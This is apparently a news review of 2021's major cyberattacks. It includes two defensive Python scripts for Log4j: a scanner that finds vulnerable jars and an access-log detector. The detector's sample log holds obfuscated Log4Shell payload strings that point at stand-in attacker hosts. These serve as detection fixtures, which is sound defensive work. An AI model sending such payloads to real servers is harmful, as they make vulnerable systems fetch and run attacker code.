Cybersecurity practitioners rang in 2021 while fighting fires in the aftermath of the massive SolarWinds hack. And now, with many predicting we won’t know the full scope of the Log4j vulnerability and subsequent cyberattacks for months or even years, it looks like we’ll be in for a similar 2022.

But before we start speculating on how bad the bugs are going to get next year, let’s take a look back at some of the worst cyberattacks of 2021. While it’s been a doozy of a past 12 months, and there were plenty of attacks and vulnerabilities that we could have included on this list, here’s our highly subjective review of 2021’s worst.

SolarWinds

Yes, we’re cheating a little on the timeline, because FireEye (now part of Mandiant) first discovered the breach in December 2020. The SolarWinds CEO would later say that an internal investigation showed Russian state-sponsored attackers had been inside the software provider’s network as early as January 2019. But we didn’t know that in January 2021. At the time, security analysts and policy makers were just beginning to realize that the breach was “much worse” than many had originally feared.

After the attackers broke into SolarWinds’ build environment, they inserted a backdoor (later named SUNBURST) into legitimate, signed updates of the vendor’s Orion platform, which were pushed to about 18,000 customers between March and June 2020. Because the implant arrived through the vendor’s own update channel and lay dormant for about two weeks before beaconing out, it went undetected in victims’ environments for months. U.S. officials later said the attackers went on to actively compromise about 100 private companies and nine federal agencies.

Microsoft Exchange

With U.S. companies and government agencies still reeling from SolarWinds, the Chinese state-sponsored group Hafnium exploited four previously unknown vulnerabilities in on-premises Microsoft Exchange Server (the chain later dubbed ProxyLogon) to read mailboxes and plant web shells, reportedly compromising at least 30,000 organizations in the U.S. and 250,000 globally.

“Historically, Hafnium primarily targets entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs,” Microsoft’s Tom Burt, corporate VP for customer security and trust, wrote in a March blog post.

Soon after Microsoft disclosed the bugs on March 2 and released patches, at least 10 other advanced persistent threat groups began exploiting the same flaws for espionage and coin mining. Patching closed the door but did not evict anyone already inside: web shells dropped before a server was updated kept working until someone removed them.

A month later, acting under a court order, the FBI accessed hundreds of U.S. computers still running compromised Exchange servers and deleted the web shells left behind by the Chinese state-sponsored attack.

REvil Demands $50M Ransom

In April, the Russian ransomware-as-a-service gang REvil hit Apple supplier Quanta Computer with ransomware and demanded $50 million.

IBM X-Force estimates that REvil made at least $123 million in profits in 2020 and stole around 21.6 terabytes of data.

The timing of the April attack proved significant. It happened just days before reports surfaced that the Justice Department formed a ransomware task force and about a week before U.S. Department of Homeland Security Secretary Alejandro Mayorkas said the Biden administration would soon release a plan to combat ransomware.

So did REvil’s double-extortion tactics. The group first demanded that Quanta pay to regain access to its encrypted data. But having stolen Apple product designs from Quanta’s network, REvil quickly pivoted and demanded that Apple pay the $50 million, or it would leak more blueprints for the yet-to-be-released devices.

Colonial Pipeline

A month later, the criminal group DarkSide breached Colonial Pipeline’s corporate network, and the company shut down the pipeline that carries much of the East Coast’s fuel while it assessed the damage. Colonial’s CEO ultimately authorized a ransom payment of about $4.4 million, roughly half of which the Justice Department later recovered by seizing the bitcoin wallet it was paid into.

The Colonial Pipeline breach is significant, and scary, because it moved cybercrime closer to industrial targets and critical infrastructure. DarkSide got in with a compromised password for a legacy VPN account that had no multi-factor authentication, and it reached Colonial’s IT network, not the operational technology (OT) control systems that run the physical pipeline.

However, “if they use VPN credentials that are compromised from an IT network, then in the future there’s nothing to prevent that same thing from happening directly to an OT network, and it’s very hard to detect that,” said Patton Adams, strategic cyberthreat intelligence lead at Accenture, during a cyber threat landscape trends session at Black Hat.

Kaseya

About a month after extorting $11 million from meat processor JBS in a Memorial Day weekend ransomware attack, REvil demanded $70 million from Kaseya, the largest publicly known ransom demand at the time.

The attack, which hit late on Friday, July 2, ahead of the Fourth of July holiday weekend, had two parts. First, the criminals exploited a chain of zero-day flaws, starting with an authentication bypass, in on-premises Kaseya VSA servers run by managed service providers (MSPs). That gave them administrative control of VSA, the tool those MSPs use to push software to customer machines, and they used VSA’s own update mechanism to deploy REvil ransomware to the endpoints it managed, then demanded $70 million for a universal decryptor.

Kaseya estimated the attack hit “fewer than 60” of its direct customers. Because most of those were MSPs, however, the total number of affected organizations is likely between 800 and 1,500, including New Zealand schools, a Swedish grocery store chain, and hundreds of other small and midsized businesses.

Microsoft’s (Print)Nightmare Continues

In July, Microsoft disclosed yet another critical Windows bug, PrintNightmare (CVE-2021-34527), in the Windows Print Spooler, the service that lets users and applications share connected printers. Because the spooler runs as SYSTEM and is on by default on every Windows machine, domain controllers included, a successful exploit gives an attacker code execution with full control of the host: viewing or deleting data, installing programs, or creating new accounts. Every supported Windows version was affected, client and server alike, and Microsoft shipped an out-of-band update. Two checks followed the patch in practice: disable the Print Spooler service on servers that don’t need it, domain controllers first, and confirm that Point and Print is not configured to let non-administrators install printer drivers, since that setting undermines the fix.

Log4j

And now, dear reader, we’ve reached the present and the already-infamous Log4j, or Log4Shell: a zero-day in the Apache Log4j 2 open source logging library that sits inside a huge share of Java applications and services, including products from Microsoft, Twitter, VMware, Amazon, and Apple, among others. The flaw is a feature, not a typo: Log4j expanded ${...} lookups inside the messages it logged, and a ${jndi:ldap://attacker/x} lookup made the server fetch and load a Java object from the attacker’s server. Any attacker-controlled string that got logged, whether an HTTP header, a username, or a chat message, could trigger it.

Shortly after Apache disclosed the remote code execution vulnerability (CVE-2021-44228) on Dec. 9 and released a patched version, threat researchers and the U.S. Cybersecurity and Infrastructure Security Agency warned that attackers were already exploiting the flaw, which received the maximum CVSS score of 10.0.

As of Dec. 20, Check Point reported that its researchers had seen exploitation attempts against more than 48% of the corporate networks it monitors worldwide.

Wiz, the cloud security startup that discovered the Microsoft Cosmos DB vulnerability (ChaosDB) earlier this year, said more than 89% of all IT environments contained vulnerable Log4j libraries. Finding them is harder than it sounds: log4j-core is routinely bundled inside application archives rather than installed on its own, so an inventory has to look inside jars, wars and ears, not just at file names.
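To make that inventory problem concrete, here is an added example (not Wiz’s, Apache’s or any vendor’s scanner) that walks a directory tree, opens every jar/war/ear it finds, recurses into archives nested inside archives, and classifies each log4j-core copy against CVE-2021-44228 by its Maven pom.properties version and whether JndiLookup.class is still present. The fixture archives it builds are constructed stand-ins that contain only the two entries the scanner reads; the version thresholds are the Dec. 2021 fix (2.15.0) plus the 2.12.2 and 2.3.1 backports for older Java, and nothing later.

```python
"""Scan a directory tree for copies of log4j-core, including jars nested inside
war/ear archives, and classify each against CVE-2021-44228. Added example, not
Apache's, Wiz's or any vendor's tool; the archives from build_fixtures() are
constructed stand-ins, not real Log4j builds."""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def version_key(version):
    """'2.14.1' -> (2, 14, 1). Only leading digits of each component count, so
    '2.0-beta9' becomes (2, 0, 0), the conservative (vulnerable) side."""
    nums = []
    for part in version.split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple(nums + [0] * (3 - len(nums)))


def classify(version, has_jndi_lookup):
    """Verdict against CVE-2021-44228 alone. Apache's later advisories raised
    the recommended version further, so treat 'fixed' as a floor."""
    if version is None:
        return "unknown-version"
    v = version_key(version)
    if v < (2, 0, 0):
        return "log4j-1.x-not-affected"
    if not has_jndi_lookup:
        return "mitigated-jndilookup-removed"
    fixed = (v >= (2, 15, 0)                   # main line
             or (2, 12, 2) <= v < (2, 13, 0)   # Java 7 backport branch
             or (2, 3, 1) <= v < (2, 4, 0))    # Java 6 backport branch
    return "fixed" if fixed else "VULNERABLE-CVE-2021-44228"


def scan_archive(data, label, findings):
    """Recurse through an in-memory zip-format archive; record every log4j-core
    copy found at any depth under an 'outer!inner' label."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = m.group(1).strip() if m else None
        has_jndi = JNDI_LOOKUP in names
        if version is not None or has_jndi:
            findings[label] = (version, classify(version, has_jndi))
        for name in names:
            if name.lower().endswith(ARCHIVE_EXTS):
                scan_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root):
    """Return {archive_label: (version, verdict)} for everything under root."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fn)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), label, findings)
    return findings


def _fake_log4j_core(version, keep_jndi=True):
    """Constructed stand-in: only the two entries the scanner reads, with
    placeholder bytes where the real class file would be."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if keep_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fixtures(root):
    """Lay out constructed sample archives under root."""
    apps = os.path.join(root, "apps")
    os.makedirs(apps, exist_ok=True)
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1"))
    with open(os.path.join(apps, "patched.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.15.0"))
    with open(os.path.join(apps, "stripped.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1", keep_jndi=False))
    # A war bundling a vulnerable log4j-core under WEB-INF/lib: exactly the
    # case a search on file names alone walks straight past.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", _fake_log4j_core("2.13.3"))
    with open(os.path.join(apps, "portal.war"), "wb") as fh:
        fh.write(buf.getvalue())


def demo():
    """Build the fixtures in a scratch directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_fixtures(root)
        return scan_tree(root)


if __name__ == "__main__":
    for label, (version, verdict) in sorted(demo().items()):
        print(f"{verdict:28} {version or '?':8} {label}")
```

Point scan_tree at a real application directory to use it. Its blind spots are the ones that bit real inventories: shaded or relocated builds that rename the package path, jars unpacked onto the classpath as loose class files, and non-Maven builds without pom.properties all come back as unknown or are missed entirely, which is why a hash- or bytecode-based check is the next step after this one.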

Microsoft initially warned that attackers were mass scanning the internet for vulnerable systems and using Log4j to install coin miners, drop Cobalt Strike beacons for credential theft and lateral movement, and steal data. Ransomware gangs soon followed, and security practitioners warn it will be months before we know the full extent of the damage. One detection caveat: the lookup fires when the malicious string is logged, not when the request succeeds, so a 404 in the access log says nothing about whether it ran; the useful question is whether the host made an outbound LDAP or RMI connection afterward.
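The mass scanning described above leaves traces in ordinary web access logs, but a plain grep for ${jndi: misses most of it, because attackers wrapped the string in Log4j’s own lookup syntax (${lower:j}, ${::-j}, URL encoding) that the library resolves before it ever sees the word jndi. Here is an added example, not Microsoft’s, Check Point’s or CISA’s detection logic, that emulates those substitutions and then flags the scheme and callback target. It assumes the common combined log format; the five log lines are constructed for this example, and the resolver covers only the lower, upper and default-value (:-) lookups, not every lookup Log4j supports.

```python
"""Flag CVE-2021-44228 exploitation attempts in web access logs, including the
lookup-nesting tricks used to slip past a plain grep for '${jndi:'. Added
example, not Microsoft's, Check Point's or CISA's detection logic; SAMPLE_LOG
is constructed for this example and assumes the combined log format."""
import re
from urllib.parse import unquote

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}]*)", re.IGNORECASE)
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"')

# Constructed sample lines: one benign request, then four attempts that hide
# the same lookup differently (plain, URL-encoded in the path, ${::-x} pieces,
# lower/upper case-mangling). Addresses are from documentation ranges.
SAMPLE_LOG = r"""203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.66:1389/a}"
198.51.100.8 - - [10/Dec/2021:03:16:01 +0000] "GET /api/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
198.51.100.9 - - [10/Dec/2021:03:17:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.example/z}"
198.51.100.10 - - [10/Dec/2021:03:18:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${lower:J}${upper:n}di:rmi://203.0.113.9:1099/o}"
"""


def resolve_lookups(text, max_rounds=64):
    """Emulate the substitutions Log4j performs before it ever sees 'jndi':
    ${lower:X}, ${upper:X} and ${whatever:-default}. Innermost lookups go
    first; any other lookup is frozen so it cannot loop, and rounds are
    capped because real payloads nest dozens deep."""
    for _ in range(max_rounds):
        m = INNER_LOOKUP.search(text)
        if not m:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("lower:"):
            rep = body[6:].lower()
        elif low.startswith("upper:"):
            rep = body[6:].upper()
        elif ":-" in body:
            rep = body.split(":-", 1)[1]
        else:
            rep = "\x00" + body + "\x01"      # freeze: ${...} stays as-is
        text = text[:m.start()] + rep + text[m.end():]
    return text.replace("\x00", "${").replace("\x01", "}")


def normalize(field):
    """Undo URL escaping (twice, for double-encoded payloads) then resolve."""
    return resolve_lookups(unquote(unquote(field)))


def scan_line(line):
    """Return a finding dict for an exploitation attempt, or None."""
    m = COMBINED.match(line)
    if not m:
        return None
    src, _ts, request, status, referer, ua = m.groups()
    for field, value in (("request", request), ("referer", referer),
                         ("user_agent", ua)):
        hit = JNDI.search(normalize(value))
        if hit:
            return {"src": src, "field": field, "scheme": hit.group(1).lower(),
                    "target": hit.group(2), "status": status}
    return None


def scan_log(text):
    """Findings for every line of a log, in file order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']:14} {f['field']:10} {f['scheme']:5} {f['target']}")
```

Run it against application logs as well as the web tier’s access logs: the string only matters where it was handed to Log4j, and that is often a back-end service that logged a header the proxy passed through. The scheme and target it extracts are what you correlate with egress or DNS logs to separate the internet-wide probes from a callback that actually completed.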

“Every organization out there is going to have some exposure to this most likely,” Matt Olney, director of Talos threat intelligence said during a Cisco livestream event. “Very few will escape.”

The Next One

Do I feel like I’m jinxing the remaining days of the year by simply writing this article? Absolutely. So consider this the equivalent of knocking on wood. I hope we ride out the rest of 2021 without any major cyberattacks. But I’m not going to bet on it.